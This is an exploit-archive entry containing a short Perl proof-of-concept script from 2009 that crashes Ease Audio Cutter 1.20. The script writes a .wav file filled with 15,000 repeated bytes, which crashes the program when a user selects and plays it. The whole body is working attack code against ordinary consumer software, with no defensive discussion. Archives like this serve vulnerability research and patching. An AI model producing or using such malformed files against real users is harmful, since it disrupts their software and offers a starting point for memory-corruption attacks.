id: 7024
date: 09/16/2009
title: Ease Audio Cutter 1.20 (.wav file) Local Crash PoC
author: zAx
cves: 

==================================================
Ease Audio Cutter 1.20 (.wav file) Local Crash PoC
==================================================


#!/usr/bin/perl
###########################################################################
#             Ease Audio Cutter 1.20 (.wav file) Local Crash PoC          #
#                               By : zAx                                  #
###########################################################################
#             Application Homepage : http://mp3-cutter.com                #
#   Application Download : http://mp3-cutter.com/download/audiocutter.exe #
# Description : Click Select file button, select our file and click Play  #
###########################################################################
$crash = "\x42" x 15000;
my $file = "zAx_Crash.wav";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $crash;
close($FILE);
print "Done \n";



#  0day.today [2023-03-27]  #